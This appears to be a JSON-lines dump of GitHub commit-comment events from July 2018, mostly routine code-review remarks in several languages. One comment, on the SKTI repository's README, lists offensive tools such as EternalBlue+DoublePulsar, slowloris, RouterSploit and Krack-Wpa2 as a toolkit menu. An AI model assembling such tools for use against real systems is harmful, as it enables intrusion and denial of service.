{"id":"7913572434","type":"CommitCommentEvent","actor":{"login":"muhrik"},"repo":{"name":"thomasmari/CZK_project"},"payload":{"comment":{"id":29583502,"position":null,"line":null,"path":null,"commit_id":"915871d40b8f4b9efe38c4f9628e960d4717195a","created_at":"2018-07-03T16:07:41Z","updated_at":"2018-07-03T16:07:41Z","author_association":"COLLABORATOR","body":"@thomasmari \r\nResponding via email"}},"created_at":"2018-07-03T16:07:41Z"}
{"id":"7913572700","type":"CommitCommentEvent","actor":{"login":"greglandrum"},"repo":{"name":"susanhleung/rdkit"},"payload":{"comment":{"id":29583507,"position":24,"line":24,"path":"Code/GraphMol/MolStandardize/Charge.cpp","commit_id":"da28467f8c6ccd53e1db04be680f709f58da565a","created_at":"2018-07-03T16:07:44Z","updated_at":"2018-07-03T16:07:44Z","author_association":"NONE","body":"The next two lines are a bit strange...\r\nWhy do you need to get pointer at all?"}},"created_at":"2018-07-03T16:07:44Z"}
{"id":"7913572777","type":"CommitCommentEvent","actor":{"login":"aslakhellesoy"},"repo":{"name":"cucumber/cucumber-java-skeleton"},"payload":{"comment":{"id":29583508,"position":null,"line":null,"path":null,"commit_id":"e163b28ae2f91128c4d739e5a297f2779897072c","created_at":"2018-07-03T16:07:44Z","updated_at":"2018-07-03T16:07:44Z","author_association":"CONTRIBUTOR","body":"Oh I see - yes, that would start sending results to Pro for sure. Feel free to revert this commit."}},"created_at":"2018-07-03T16:07:44Z"}
{"id":"7913580358","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"akoumjian/b9labs-remittance"},"payload":{"comment":{"id":29583517,"position":null,"line":null,"path":null,"commit_id":"795839d720f8e857702664ba9810290dad2c66d4","created_at":"2018-07-03T16:09:09Z","updated_at":"2018-07-03T16:09:09Z","author_association":"NONE","body":"For your tests, try https://gist.github.com/xavierlepretre/d5583222fde52ddfbc58b7cfa0d2d0a9"}},"created_at":"2018-07-03T16:09:09Z"}
{"id":"7913581357","type":"CommitCommentEvent","actor":{"login":"greglandrum"},"repo":{"name":"susanhleung/rdkit"},"payload":{"comment":{"id":29583519,"position":35,"line":35,"path":"Code/GraphMol/MolStandardize/Charge.cpp","commit_id":"da28467f8c6ccd53e1db04be680f709f58da565a","created_at":"2018-07-03T16:09:20Z","updated_at":"2018-07-03T16:09:20Z","author_association":"NONE","body":"`if( matches != 0)` with an unsigned is a bit ugly, you can just do `if( matches)`"}},"created_at":"2018-07-03T16:09:20Z"}
{"id":"7913582383","type":"CommitCommentEvent","actor":{"login":"juja-chan"},"repo":{"name":"juja-chan/semesteraufgabe"},"payload":{"comment":{"id":29583524,"position":11,"line":11,"path":"store/store.java","commit_id":"df8ac5cca91e7634d1ada27ba09100a24fc8a837","created_at":"2018-07-03T16:09:32Z","updated_at":"2018-07-03T16:09:32Z","author_association":"OWNER","body":"hey chieme, sollte nicht die Klasse mit einem Großbuchstaben beginnen? xD"}},"created_at":"2018-07-03T16:09:32Z"}
{"id":"7913589055","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"akoumjian/b9labs-remittance"},"payload":{"comment":{"id":29583540,"position":null,"line":null,"path":null,"commit_id":"795839d720f8e857702664ba9810290dad2c66d4","created_at":"2018-07-03T16:10:44Z","updated_at":"2018-07-03T16:10:44Z","author_association":"NONE","body":"Avoid using `.deployed()` in tests. Create a new one each `it`."}},"created_at":"2018-07-03T16:10:44Z"}
{"id":"7913591067","type":"CommitCommentEvent","actor":{"login":"project3J"},"repo":{"name":"project3J/UploadMedia"},"payload":{"comment":{"id":29583543,"position":8,"line":55,"path":"app/src/main/java/com/delaroystudios/uploadmedia/networking/ApiConfig.java","commit_id":"e43612f11e5c1f35ea1252c2b70e1e89057cb853","created_at":"2018-07-03T16:11:06Z","updated_at":"2018-07-03T16:11:06Z","author_association":"OWNER","body":"gr8"}},"created_at":"2018-07-03T16:11:06Z"}
{"id":"7913600949","type":"CommitCommentEvent","actor":{"login":"joseamador0898"},"repo":{"name":"joseamador0898/background-generator"},"payload":{"comment":{"id":29583571,"position":null,"line":null,"path":null,"commit_id":"5e11b0d5a9e6a498196db2ec49ecc4cae3f0c365","created_at":"2018-07-03T16:12:56Z","updated_at":"2018-07-03T16:12:56Z","author_association":"OWNER","body":"Hi marcy"}},"created_at":"2018-07-03T16:12:56Z"}
{"id":"7913601598","type":"CommitCommentEvent","actor":{"login":"JeanPaulLucien"},"repo":{"name":"JeanPaulLucien/saliengame_idler"},"payload":{"comment":{"id":29583572,"position":null,"line":null,"path":null,"commit_id":"a8c7b3e2d19ac7ba4722515780b30fac8ba9305b","created_at":"2018-07-03T16:13:02Z","updated_at":"2018-07-03T16:13:02Z","author_association":"OWNER","body":"So, it will not block the view."}},"created_at":"2018-07-03T16:13:02Z"}
{"id":"7913606615","type":"CommitCommentEvent","actor":{"login":"flyinghead"},"repo":{"name":"flyinghead/reicast-emulator"},"payload":{"comment":{"id":29583599,"position":null,"line":null,"path":null,"commit_id":"292ff84e2253d77efaff906151dde786709eab39","created_at":"2018-07-03T16:13:56Z","updated_at":"2018-07-03T16:13:56Z","author_association":"OWNER","body":"My favorite game. I make sure to test it regularly and would not allow a decrease in framerate! "}},"created_at":"2018-07-03T16:13:56Z"}
{"id":"7913607526","type":"CommitCommentEvent","actor":{"login":"drc-creare"},"repo":{"name":"creare-com/podpac"},"payload":{"comment":{"id":29583601,"position":null,"line":null,"path":null,"commit_id":"e143eb299bbbd1f1a38e871fa85ee43c3cf1fc80","created_at":"2018-07-03T16:14:08Z","updated_at":"2018-07-03T16:14:08Z","author_association":"CONTRIBUTOR","body":"@jmilloy and @mpu-creare I changed the special handling of using an xarray to get data from a UnitsDataArray so that it tests to make sure that the xarray being used as a key has exactly 1 dimension. This behavior was introduced in this commit:\r\n\r\nhttps://github.com/creare-com/podpac/commit/572aac00b6f7dc45aef12bda3157e2112223b913\r\n\r\nI think that the xarray has to be 1 dimensional, but perhaps one of you knows of another situation that this would work in. I have tried a multidimensional xarray and it throws an IndexError (there is a unit test in test_units.py for this case)."}},"created_at":"2018-07-03T16:14:08Z"}
{"id":"7913612388","type":"CommitCommentEvent","actor":{"login":"johnda98"},"repo":{"name":"Azure/coco-framework"},"payload":{"comment":{"id":29583612,"position":null,"line":null,"path":null,"commit_id":"a05fd29fe62cd350a2126bbcad36b400d8be211d","created_at":"2018-07-03T16:15:03Z","updated_at":"2018-07-03T16:15:03Z","author_association":"NONE","body":"When is the OSource to be released ?"}},"created_at":"2018-07-03T16:15:03Z"}
{"id":"7913614171","type":"CommitCommentEvent","actor":{"login":"BRevzin"},"repo":{"name":"cplusplus/draft"},"payload":{"comment":{"id":29583619,"position":33,"line":1979,"path":"source/expressions.tex","commit_id":"fa323da9d0896fce007d70b5445d99bf3298027f","created_at":"2018-07-03T16:15:24Z","updated_at":"2018-07-03T16:15:24Z","author_association":"NONE","body":"In [temp.param]/11, the wording talks about the designated concept of the *qualified-concept-name*. Could we do something like that here for consistency? Call the *qualified-concept-name* `Q`, with designated concept `C`, and then if `Q` is a *concept-name*, satisfy `C<decltype((E))>` and if `Q` is a *partial-concept-id* of the form `C<A1, A2, ..., An>` then satisfy `C<decltype((E)), A1, A2, ..., An>`?"}},"created_at":"2018-07-03T16:15:24Z"}
{"id":"7913614836","type":"CommitCommentEvent","actor":{"login":"drc-creare"},"repo":{"name":"creare-com/podpac"},"payload":{"comment":{"id":29583621,"position":null,"line":null,"path":null,"commit_id":"e143eb299bbbd1f1a38e871fa85ee43c3cf1fc80","created_at":"2018-07-03T16:15:31Z","updated_at":"2018-07-03T16:15:31Z","author_association":"CONTRIBUTOR","body":"FYI, it looks like the UnitsDataArray.set() function was introduced to handle the multidimensional key."}},"created_at":"2018-07-03T16:15:31Z"}
{"id":"7913616638","type":"CommitCommentEvent","actor":{"login":"greglandrum"},"repo":{"name":"susanhleung/rdkit"},"payload":{"comment":{"id":29583625,"position":11,"line":36,"path":"Code/GraphMol/MolStandardize/Charge.cpp","commit_id":"b52be00e47078411d8fdf91af7d88f9bb0bc894b","created_at":"2018-07-03T16:15:51Z","updated_at":"2018-07-03T16:15:51Z","author_association":"NONE","body":"I think this would be more efficient as:\r\n```\r\n\t\tif ( matches != 0 ) {\r\n\t\t\tfor (const auto &match : res) {\r\n\t\t\t\tfor (const auto &pair : match) {\r\n\t\t\t\t\tauto idx = pair.second;\r\n\t\t\t\t\t// std::cout << pair.first << \", \" << pair.second << std::endl; \r\n\t\t\t\t\tAtom* atom = omol->getAtomWithIdx(idx);\r\n\t\t\t\t\t// std::cout << atom->getSymbol() << std::endl;\r\n\t\t\t\t\tstd::cout << \"Applying charge correction \" << cc.Name << \" \" << \r\n\t\t\t\t\t\t\t\t\tatom->getSymbol() << \" \" << cc.Charge << std::endl;\r\n\t\t\t\t\tatom->setFormalCharge(cc.Charge);\r\n\t\t\t  }\r\n\t\t  }\r\n\t}\r\n\r\n```"}},"created_at":"2018-07-03T16:15:51Z"}
{"id":"7913618451","type":"CommitCommentEvent","actor":{"login":"ms2sato"},"repo":{"name":"tomoharutsutsumi/class_practice"},"payload":{"comment":{"id":29583626,"position":38,"line":210,"path":"ruby_fourth.rb","commit_id":"2674be7a6d63fe9ee6d43cf6dba673bed9214f8e","created_at":"2018-07-03T16:16:11Z","updated_at":"2018-07-03T16:16:11Z","author_association":"COLLABORATOR","body":"増えてる！増えてるよ！"}},"created_at":"2018-07-03T16:16:11Z"}
{"id":"7913620805","type":"CommitCommentEvent","actor":{"login":"JJRcop"},"repo":{"name":"Regalis11/Barotrauma"},"payload":{"comment":{"id":29583631,"position":null,"line":null,"path":null,"commit_id":"2d0ed994bf94c4901dce6abc7aa434ba915500b5","created_at":"2018-07-03T16:16:35Z","updated_at":"2018-07-03T16:16:35Z","author_association":"NONE","body":"Localization, yay! 😁"}},"created_at":"2018-07-03T16:16:35Z"}
{"id":"7913620924","type":"CommitCommentEvent","actor":{"login":"0xc0re"},"repo":{"name":"adbertram/PowerTrello"},"payload":{"comment":{"id":29583632,"position":null,"line":null,"path":null,"commit_id":"2b3caf444a36fd0189828fdc8e54c89f071bfdf7","created_at":"2018-07-03T16:16:37Z","updated_at":"2018-07-03T16:16:37Z","author_association":"NONE","body":"This breaks the module -- Get-TrelloBoard no longer works. Reverting this line back fixes the issue."}},"created_at":"2018-07-03T16:16:37Z"}
{"id":"7913621700","type":"CommitCommentEvent","actor":{"login":"dev-101"},"repo":{"name":"osclass/Osclass"},"payload":{"comment":{"id":29583633,"position":14,"line":77,"path":"oc-includes/osclass/gui/functions.php","commit_id":"4f9d3288e1e33b3a45191bebf45858834b96f29a","created_at":"2018-07-03T16:16:46Z","updated_at":"2018-07-03T16:16:46Z","author_association":"CONTRIBUTOR","body":"ImageResizer is depricated"}},"created_at":"2018-07-03T16:16:46Z"}
{"id":"7913621752","type":"CommitCommentEvent","actor":{"login":"greglandrum"},"repo":{"name":"susanhleung/rdkit"},"payload":{"comment":{"id":29583634,"position":11,"line":36,"path":"Code/GraphMol/MolStandardize/Charge.cpp","commit_id":"b52be00e47078411d8fdf91af7d88f9bb0bc894b","created_at":"2018-07-03T16:16:46Z","updated_at":"2018-07-03T16:16:46Z","author_association":"NONE","body":"apologies that the formatting on that was horrible. I guess you have tabs in your code (instead of spaces) and that caused the problem.\r\nWe'll have to do a round of reformatting (there's an automatic tool for it) in the not too distant future\r\n"}},"created_at":"2018-07-03T16:16:46Z"}
{"id":"7913622090","type":"CommitCommentEvent","actor":{"login":"Jazaret"},"repo":{"name":"Jazaret/Nancy"},"payload":{"comment":{"id":29583635,"position":null,"line":null,"path":null,"commit_id":"e6e61719309754654970a0b79900a5b4e2d065c3","created_at":"2018-07-03T16:16:50Z","updated_at":"2018-07-03T16:16:50Z","author_association":"OWNER","body":"thank you!"}},"created_at":"2018-07-03T16:16:50Z"}
{"id":"7913622578","type":"CommitCommentEvent","actor":{"login":"ms2sato"},"repo":{"name":"tomoharutsutsumi/class_practice"},"payload":{"comment":{"id":29583636,"position":7,"line":96,"path":"ruby_fourth.rb","commit_id":"2674be7a6d63fe9ee6d43cf6dba673bed9214f8e","created_at":"2018-07-03T16:16:55Z","updated_at":"2018-07-03T16:16:55Z","author_association":"COLLABORATOR","body":"else の書き方、調べましたか？\r\n調べたとしたらどんなものを見てここを書いたか教えてください。"}},"created_at":"2018-07-03T16:16:55Z"}
{"id":"7913624696","type":"CommitCommentEvent","actor":{"login":"ms2sato"},"repo":{"name":"tomoharutsutsumi/class_practice"},"payload":{"comment":{"id":29583643,"position":51,"line":219,"path":"ruby_fourth.rb","commit_id":"2674be7a6d63fe9ee6d43cf6dba673bed9214f8e","created_at":"2018-07-03T16:17:18Z","updated_at":"2018-07-03T16:17:18Z","author_association":"COLLABORATOR","body":"このelseifも96行目と同様です。"}},"created_at":"2018-07-03T16:17:18Z"}
{"id":"7913626848","type":"CommitCommentEvent","actor":{"login":"coffeedogs"},"repo":{"name":"Bitmessage/PyBitmessage"},"payload":{"comment":{"id":29583649,"position":null,"line":null,"path":null,"commit_id":"799933086a0daf95c3da854530d8e8cbdc8d244d","created_at":"2018-07-03T16:17:43Z","updated_at":"2018-07-03T16:17:43Z","author_association":"COLLABORATOR","body":"I suppose this might relate to #886. You're in territory that I've not walked yet (running Windows, running GPUs). If we can move off pyelliptic one day (upstream abandoned) in favour of nacl/cryptography (or whatever is current at the time we do it), that would be nice. A can of worms though."}},"created_at":"2018-07-03T16:17:43Z"}
{"id":"7913627242","type":"CommitCommentEvent","actor":{"login":"ms2sato"},"repo":{"name":"tomoharutsutsumi/class_practice"},"payload":{"comment":{"id":29583650,"position":50,"line":218,"path":"ruby_fourth.rb","commit_id":"2674be7a6d63fe9ee6d43cf6dba673bed9214f8e","created_at":"2018-07-03T16:17:48Z","updated_at":"2018-07-03T16:17:48Z","author_association":"COLLABORATOR","body":"ここも `#{}` を外せば良いと思います。指摘受けたら類似のところは対応していくようにすると丁寧な仕事だと評価されます。"}},"created_at":"2018-07-03T16:17:48Z"}
{"id":"7913628660","type":"CommitCommentEvent","actor":{"login":"HuzefaMandvi"},"repo":{"name":"CCI-MOC/ORE"},"payload":{"comment":{"id":29583654,"position":null,"line":null,"path":null,"commit_id":"1a1f6b4205b9e3ced6438012f0b2d9e17ff454aa","created_at":"2018-07-03T16:18:04Z","updated_at":"2018-07-03T16:18:04Z","author_association":"COLLABORATOR","body":"Resolve #17 "}},"created_at":"2018-07-03T16:18:04Z"}
{"id":"7913628674","type":"CommitCommentEvent","actor":{"login":"twinaphex"},"repo":{"name":"flyinghead/reicast-emulator"},"payload":{"comment":{"id":29583655,"position":null,"line":null,"path":null,"commit_id":"292ff84e2253d77efaff906151dde786709eab39","created_at":"2018-07-03T16:18:05Z","updated_at":"2018-07-03T16:18:05Z","author_association":"NONE","body":"Heh yeah. Well, I guess it is just a particularly intensive game."}},"created_at":"2018-07-03T16:18:05Z"}
{"id":"7913630396","type":"CommitCommentEvent","actor":{"login":"garyskeete"},"repo":{"name":"garyskeete/linux-modder.github.io"},"payload":{"comment":{"id":29583658,"position":null,"line":null,"path":null,"commit_id":"2f7fbae016efabe44b69740f42674b44cc088952","created_at":"2018-07-03T16:18:24Z","updated_at":"2018-07-03T16:18:24Z","author_association":"OWNER","body":" Symbiont Intelligent Chimera Kinetics"}},"created_at":"2018-07-03T16:18:24Z"}
{"id":"7913633135","type":"CommitCommentEvent","actor":{"login":"ms2sato"},"repo":{"name":"tomoharutsutsumi/class_practice"},"payload":{"comment":{"id":29583667,"position":38,"line":210,"path":"ruby_fourth.rb","commit_id":"2674be7a6d63fe9ee6d43cf6dba673bed9214f8e","created_at":"2018-07-03T16:18:56Z","updated_at":"2018-07-03T16:18:56Z","author_association":"COLLABORATOR","body":"あぁ、そうか。こっちは対象じゃないと思っているんだね。こっちもやって欲しいな。"}},"created_at":"2018-07-03T16:18:56Z"}
{"id":"7913639140","type":"CommitCommentEvent","actor":{"login":"danielnaber"},"repo":{"name":"languagetool-org/languagetool"},"payload":{"comment":{"id":29583677,"position":null,"line":null,"path":null,"commit_id":"1685373dedc9d430b35e834ebdf7877e5fcd21d8","created_at":"2018-07-03T16:20:04Z","updated_at":"2018-07-03T16:20:04Z","author_association":"MEMBER","body":"If these are just words replaced by other words, isn't `replace.txt` enough?"}},"created_at":"2018-07-03T16:20:04Z"}
{"id":"7913640118","type":"CommitCommentEvent","actor":{"login":"TheReyzer"},"repo":{"name":"hippogamesunity/SimpleGif"},"payload":{"comment":{"id":29583680,"position":null,"line":null,"path":null,"commit_id":"c90b737cf1b70846ecc6fa06da53f41fc0872980","created_at":"2018-07-03T16:20:15Z","updated_at":"2018-07-03T16:20:15Z","author_association":"NONE","body":"@hippogamesunity a 1000x1000 screen would have a very beautiful resolution to share the pixel arts with friends etc ... of course if this is possible"}},"created_at":"2018-07-03T16:20:15Z"}
{"id":"7913641124","type":"CommitCommentEvent","actor":{"login":"mpu-creare"},"repo":{"name":"creare-com/podpac"},"payload":{"comment":{"id":29583684,"position":null,"line":null,"path":null,"commit_id":"e143eb299bbbd1f1a38e871fa85ee43c3cf1fc80","created_at":"2018-07-03T16:20:26Z","updated_at":"2018-07-03T16:20:26Z","author_association":"CONTRIBUTOR","body":"Perfect. Nice fix. "}},"created_at":"2018-07-03T16:20:26Z"}
{"id":"7913641421","type":"CommitCommentEvent","actor":{"login":"ms2sato"},"repo":{"name":"tomoharutsutsumi/class_practice"},"payload":{"comment":{"id":29583685,"position":23,"line":189,"path":"ruby_fourth.rb","commit_id":"2674be7a6d63fe9ee6d43cf6dba673bed9214f8e","created_at":"2018-07-03T16:20:29Z","updated_at":"2018-07-03T16:20:29Z","author_association":"COLLABORATOR","body":"あー、なるほどなぁ。そういう考え方もあるね。まだ良いかなぁ。\r\n\r\nどうして `index += 1` をやめるように伝えた方というと、 ループの引数の index を増やしちゃうのは読む人が読み間違えるからなんだよ。勝手に増やすと想定外の値になるから。\r\n\r\nもしも1増やしたいならローカル変数を別に作った方がわかりやすいですよ。"}},"created_at":"2018-07-03T16:20:29Z"}
{"id":"7913642179","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29583688,"position":null,"line":null,"path":null,"commit_id":"faf36b282b2308fe8a746472976ff83e87d6295d","created_at":"2018-07-03T16:20:37Z","updated_at":"2018-07-03T16:20:37Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [wordpresss](https://wordpresss-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/wordpress-s3](https://wordpresss-static-docs.pantheonsite.io/docs/wordpress-s3)\n"}},"created_at":"2018-07-03T16:20:37Z"}
{"id":"7913642399","type":"CommitCommentEvent","actor":{"login":"scarytom"},"repo":{"name":"tim-group/stackbuilder"},"payload":{"comment":{"id":29583689,"position":null,"line":null,"path":null,"commit_id":"49079519bfca7d77dcc3949b91c6040632608b2c","created_at":"2018-07-03T16:20:39Z","updated_at":"2018-07-03T16:20:39Z","author_association":"MEMBER","body":"I don't know what you call yourself at the weekend, so I had to allow everyone."}},"created_at":"2018-07-03T16:20:39Z"}
{"id":"7913644432","type":"CommitCommentEvent","actor":{"login":"nunoplopes"},"repo":{"name":"Z3Prover/z3"},"payload":{"comment":{"id":29583692,"position":40,"line":128,"path":"src/tactic/core/reduce_invertible_tactic.cpp","commit_id":"a73d0303212d47b10d1740f8b41d74feb906113f","created_at":"2018-07-03T16:21:04Z","updated_at":"2018-07-03T16:21:04Z","author_association":"MEMBER","body":"nice catch!  this should be fixed now, thanks!"}},"created_at":"2018-07-03T16:21:04Z"}
{"id":"7913647596","type":"CommitCommentEvent","actor":{"login":"huqiwen0313"},"repo":{"name":"greenelab/czi-hca-report"},"payload":{"comment":{"id":29583705,"position":7,"line":131,"path":"content/03.aim1.md","commit_id":"552aa46e88bdda1c529da6b3a14aa38805ba272a","created_at":"2018-07-03T16:21:41Z","updated_at":"2018-07-03T16:21:41Z","author_association":"MEMBER","body":"I used salmon 0.8.1. will added into the text"}},"created_at":"2018-07-03T16:21:41Z"}
{"id":"7913649679","type":"CommitCommentEvent","actor":{"login":"strophy"},"repo":{"name":"dashpay/dash-website"},"payload":{"comment":{"id":29583715,"position":5,"line":19,"path":"_data/wallets-collection.yml","commit_id":"3046a47756196b21a6da6adca2af5161f3ec2e2b","created_at":"2018-07-03T16:22:07Z","updated_at":"2018-07-03T16:22:07Z","author_association":"NONE","body":"This should be win64, not win32"}},"created_at":"2018-07-03T16:22:07Z"}
{"id":"7913651769","type":"CommitCommentEvent","actor":{"login":"ms2sato"},"repo":{"name":"tomoharutsutsumi/class_practice"},"payload":{"comment":{"id":29583724,"position":19,"line":187,"path":"ruby_fourth.rb","commit_id":"2674be7a6d63fe9ee6d43cf6dba673bed9214f8e","created_at":"2018-07-03T16:22:30Z","updated_at":"2018-07-03T16:22:30Z","author_association":"COLLABORATOR","body":"前の指摘を受けて修正してくれたと思うのだけど\r\nそもそも `@connector` というのが意味的に妙なんだ。例えばこの変数は `@items` とかでも良いようなものだと思う。何かをつなぐもの（connector）ではないからね。"}},"created_at":"2018-07-03T16:22:30Z"}
{"id":"7913653121","type":"CommitCommentEvent","actor":{"login":"nunoplopes"},"repo":{"name":"Z3Prover/z3"},"payload":{"comment":{"id":29583730,"position":9,"line":1625,"path":"src/ast/ast.h","commit_id":"026265f9a3709c7bf9443c75f3e6b419bc762d4a","created_at":"2018-07-03T16:22:45Z","updated_at":"2018-07-03T16:22:45Z","author_association":"MEMBER","body":"are you sure this was intended?  This will prevent this method from being inlined."}},"created_at":"2018-07-03T16:22:45Z"}
{"id":"7913654973","type":"CommitCommentEvent","actor":{"login":"lichray"},"repo":{"name":"cplusplus/draft"},"payload":{"comment":{"id":29583733,"position":null,"line":null,"path":null,"commit_id":"fa323da9d0896fce007d70b5445d99bf3298027f","created_at":"2018-07-03T16:23:08Z","updated_at":"2018-07-03T16:23:08Z","author_association":"CONTRIBUTOR","body":"If the return-type-requirement is a qualified-concept-name, let C be the concept designed by the qualified-concept-name.\r\nIf the qualified-concept-name ends with a concept-name, C<decltype((E))> shall be satisfied. Otherwise, the qualified-concept-name ends with a partial-concept-id, in which case ... shall be satisfied."}},"created_at":"2018-07-03T16:23:08Z"}
{"id":"7913655907","type":"CommitCommentEvent","actor":{"login":"al2na"},"repo":{"name":"al2na/methylKit"},"payload":{"comment":{"id":29583735,"position":null,"line":null,"path":null,"commit_id":"f8020c0bb942e432014c1b00b2df8fcd43337374","created_at":"2018-07-03T16:23:17Z","updated_at":"2018-07-03T16:23:17Z","author_association":"OWNER","body":"can you confirm it is faster with multiple cores and using methylDB objects ?"}},"created_at":"2018-07-03T16:23:17Z"}
{"id":"7913659489","type":"CommitCommentEvent","actor":{"login":"2604150210"},"repo":{"name":"webturing/cplusplus"},"payload":{"comment":{"id":29583740,"position":null,"line":null,"path":null,"commit_id":"89f958d9cf8c08f5a1fbf7d2ce7e1a64ee4f25a7","created_at":"2018-07-03T16:23:58Z","updated_at":"2018-07-03T16:23:58Z","author_association":"COLLABORATOR","body":"数字划分这三道题挺不错的，既考到了组合数，又考到了递推转换关系，我要经常回来做做，以免忘了。^_^"}},"created_at":"2018-07-03T16:23:58Z"}
{"id":"7913659848","type":"CommitCommentEvent","actor":{"login":"lsldim"},"repo":{"name":"lsldim/hello-world"},"payload":{"comment":{"id":29583741,"position":3,"line":2,"path":"README.md","commit_id":"c7344295581f3634b439178addb5ca991930c0c5","created_at":"2018-07-03T16:24:02Z","updated_at":"2018-07-03T16:24:02Z","author_association":"OWNER","body":"sfasdf"}},"created_at":"2018-07-03T16:24:02Z"}
{"id":"7913665585","type":"CommitCommentEvent","actor":{"login":"ms2sato"},"repo":{"name":"tomoharutsutsumi/class_practice"},"payload":{"comment":{"id":29583755,"position":41,"line":213,"path":"ruby_fourth.rb","commit_id":"2674be7a6d63fe9ee6d43cf6dba673bed9214f8e","created_at":"2018-07-03T16:25:06Z","updated_at":"2018-07-03T16:25:06Z","author_association":"COLLABORATOR","body":"ここにインデントいらないよね。"}},"created_at":"2018-07-03T16:25:06Z"}
{"id":"7913674384","type":"CommitCommentEvent","actor":{"login":"etaylor8086"},"repo":{"name":"aprilwade/randomprime"},"payload":{"comment":{"id":29583772,"position":null,"line":null,"path":null,"commit_id":"38c23241bb83f77fb9a452fb03a1ac98317c5867","created_at":"2018-07-03T16:26:43Z","updated_at":"2018-07-03T16:26:43Z","author_association":"NONE","body":"Thank you so much!"}},"created_at":"2018-07-03T16:26:43Z"}
{"id":"7913674658","type":"CommitCommentEvent","actor":{"login":"HawkstoNGriM"},"repo":{"name":"HawkstoNGriM/SKTI"},"payload":{"comment":{"id":29583773,"position":6,"line":6,"path":"README.md","commit_id":"ef3046825a4bcbeb96f3a38fdc665d3a6b8b1bf1","created_at":"2018-07-03T16:26:46Z","updated_at":"2018-07-03T16:26:46Z","author_association":"OWNER","body":"1.Ngrok  2.4nonimizer 3.Neuron  4.NoIp  5.UfoNet 6.Cupp  7.Beelogger  8.Xerxes  9.Infoga  10.anonym8  11.sn1per 12.slowloris  13.eternalblue+doublepulsar  14.MITMf 15.KatanaFramework  16.FluxionNetwork  17.FluxionWifiAnalyzer  18.Xerosploit  19.Fsociety 20.VeilFramework  21.Responder  22.RedHawk  23.XattackeR  24.QRLJacker  25.sAINT  26.AstroID  27.TrapE  28.RouterSploit  29.Airgeddon  30.Krack-Wpa2  31.GasMaskOSINT  Or select *u* for update  \\n "}},"created_at":"2018-07-03T16:26:46Z"}
{"id":"7913684182","type":"CommitCommentEvent","actor":{"login":"cjluo-nuro"},"repo":{"name":"bazelbuild/bazel"},"payload":{"comment":{"id":29583794,"position":null,"line":null,"path":null,"commit_id":"b20c10768a3abdc1be3ef142e33654c985fe690b","created_at":"2018-07-03T16:28:36Z","updated_at":"2018-07-03T16:28:36Z","author_association":"NONE","body":"I tried removing it locally, but the test will fail:\r\n\r\nERROR: /home/cjluo/.cache/bazel/_bazel_cjluo/7adfbb89079352150e37a4778fa680bd/sandbox/linux-sandbox/1181/execroot/io_bazel/_tmp/3b29f20c5577f069567a267816cbc82f/TEMP_TEMP_TEMP/BUILD:7:1: Linking of rule '//:hello' failed (Exit 1)\r\nexternal/org_linaro_components_toolchain_gcc_5_3_1/arm-linux-gnueabihf/bin/ld: cannot find /lib/libpthread.so.0\r\nexternal/org_linaro_components_toolchain_gcc_5_3_1/arm-linux-gnueabihf/bin/ld: cannot find /usr/lib/libpthread_nonshared.a\r\ncollect2: error: ld returned 1 exit status\r\nTarget //:hello failed to build\r\n"}},"created_at":"2018-07-03T16:28:36Z"}
{"id":"7913688535","type":"CommitCommentEvent","actor":{"login":"yakotta"},"repo":{"name":"yakotta/periodic-table"},"payload":{"comment":{"id":29583801,"position":50,"line":59,"path":"script.js","commit_id":"7ba718466c83bceb4ee32c58de60413742fdabe3","created_at":"2018-07-03T16:29:26Z","updated_at":"2018-07-03T16:29:26Z","author_association":"OWNER","body":"Yeah I was struggling with the .not() function for a while there. I think there were a few issues tiny in my code, and just bruteforcing it like I did made it work, but wasn't the best move in the long run. Thanks for the pointer, I've updated it :)"}},"created_at":"2018-07-03T16:29:26Z"}
{"id":"7913693138","type":"CommitCommentEvent","actor":{"login":"SrgGrch"},"repo":{"name":"blurtech/EventSharingAPP"},"payload":{"comment":{"id":29583811,"position":null,"line":null,"path":null,"commit_id":"a37a082b6ee891b78658c6e11e019e9fd1a063a5","created_at":"2018-07-03T16:30:18Z","updated_at":"2018-07-03T16:30:18Z","author_association":"MEMBER","body":"Merge #1"}},"created_at":"2018-07-03T16:30:18Z"}
{"id":"7913693718","type":"CommitCommentEvent","actor":{"login":"simpko"},"repo":{"name":"jynnie/accountability"},"payload":{"comment":{"id":29583813,"position":null,"line":null,"path":null,"commit_id":"29d1c7c8e7db016a7e76a4a95fd4e9901addc31f","created_at":"2018-07-03T16:30:24Z","updated_at":"2018-07-03T16:30:24Z","author_association":"COLLABORATOR","body":"work has left me lazy and sitting at ~500 wanikani reviews for the past two weeks..... maybe i should do some reviews........ ああああ"}},"created_at":"2018-07-03T16:30:24Z"}
{"id":"7913697195","type":"CommitCommentEvent","actor":{"login":"AuditeMarlow"},"repo":{"name":"AuditeMarlow/base16-manager"},"payload":{"comment":{"id":29583821,"position":null,"line":null,"path":null,"commit_id":"059867743040f7a91fa6ce00f44992083da20343","created_at":"2018-07-03T16:31:02Z","updated_at":"2018-07-03T16:31:02Z","author_association":"OWNER","body":"Using `find` means we'll have to implement a `gfind` version for MacOS as well."}},"created_at":"2018-07-03T16:31:02Z"}
{"id":"7913697643","type":"CommitCommentEvent","actor":{"login":"ur1y"},"repo":{"name":"ur1y/Twitter-Follow-and-Unfollow-Bot"},"payload":{"comment":{"id":29583823,"position":null,"line":null,"path":null,"commit_id":"c5b0d982f7bd6a623b071117cf35da8ea33dd748","created_at":"2018-07-03T16:31:08Z","updated_at":"2018-07-03T16:31:08Z","author_association":"OWNER","body":"Hi i'm trying to use your twitter-bot, but something goes wrong.\r\nCan you help me? I’m not a dev, just artist...\r\nI have installed python 3.7\r\nInstalled pip\r\nInstalled tweepy\r\n\r\nI have put screen_name, key, secret, acess token and secret in required fields, and than when I'm launching twitterBot.py that window opens and immediately closes \r\n\r\n"}},"created_at":"2018-07-03T16:31:08Z"}
